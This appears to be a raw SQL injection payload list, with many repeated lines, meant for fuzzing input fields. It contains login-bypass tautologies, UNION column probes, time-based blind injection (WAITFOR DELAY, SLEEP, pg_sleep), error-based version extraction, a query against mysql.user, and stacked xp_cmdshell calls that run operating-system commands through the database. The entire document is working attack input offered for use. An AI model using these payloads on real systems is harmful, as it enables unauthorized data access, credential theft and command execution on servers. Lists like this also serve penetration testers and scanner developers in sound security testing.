' OR '1'='1
' OR '1'='1' --
' OR '1'='1'#
' OR '1'='1'/*
' OR '1'='2
' OR '1'='2' --
' OR '1'='2'#
' OR '1'='2'/*
' OR 'x'='x
' OR 'x'='x' --
' OR 'x'='x'#
' OR 'x'='x'/*
') OR ('1'='1
') OR ('1'='1' --
') OR ('1'='1'#
') OR ('1'='1'/*
) OR (1=1
') OR '1'='1' --
') OR '1'='1'#
') OR '1'='1'/*
'||'1'='1
'||'1'='1' --
'||'1'='1'#
'||'1'='1'/*
'||1=1
'||'x'='x
'||'x'='x' --
'||'x'='x'#
'||'x'='x'/*
'; EXEC xp_cmdshell('ping 127.0.0.1')--
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,'attack',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,'attack',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,'attack',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,'attack',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT NULL,'attack',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
'; EXEC xp_cmdshell('ping 127.0.0.1')--
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
'|| (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
'; WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5';--
' OR 1=1--
' OR 1=1;--
' OR 1=1#
' OR 1=1/*
' OR 1=1;--
' OR 1=1;#
' OR 1=1;/*
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')--
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1');--
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')#
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')/*
' OR 1=1; WAITFOR DELAY '0:0:5'--
' OR 1=1; WAITFOR DELAY '0:0:5';--
' OR 1=1; WAITFOR DELAY '0:0:5'#
' OR 1=1; WAITFOR DELAY '0:0:5'/*
' OR x=x--
' OR x=x;--
' OR x=x#
' OR x=x/*
' OR x=x;--
' OR x=x;#
' OR x=x;/*
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1')--
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1');--
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1')#
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1')/*
' OR x=x; WAITFOR DELAY '0:0:5'--
' OR x=x; WAITFOR DELAY '0:0:5';--
' OR x=x; WAITFOR DELAY '0:0:5'#
' OR x=x; WAITFOR DELAY '0:0:5'/*
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')--
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1');--
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')#
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')/*
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
' AND (SELECT COUNT(*) FROM mysql.user)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' OR 1=1--
' OR 1=1;--
' OR 1=1#
' OR 1=1/*
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')--
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1');--
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')#
' OR 1=1; EXEC xp_cmdshell('ping 127.0.0.1')/*
' OR 1=1; WAITFOR DELAY '0:0:5'--
' OR 1=1; WAITFOR DELAY '0:0:5';--
' OR 1=1; WAITFOR DELAY '0:0:5'#
' OR 1=1; WAITFOR DELAY '0:0:5'/*
' OR x=x--
' OR x=x;--
' OR x=x#
' OR x=x/*
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1')--
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1');--
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1')#
' OR x=x; EXEC xp_cmdshell('ping 127.0.0.1')/*
' OR x=x; WAITFOR DELAY '0:0:5'--
' OR x=x; WAITFOR DELAY '0:0:5';--
' OR x=x; WAITFOR DELAY '0:0:5'#
' OR x=x; WAITFOR DELAY '0:0:5'/*
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
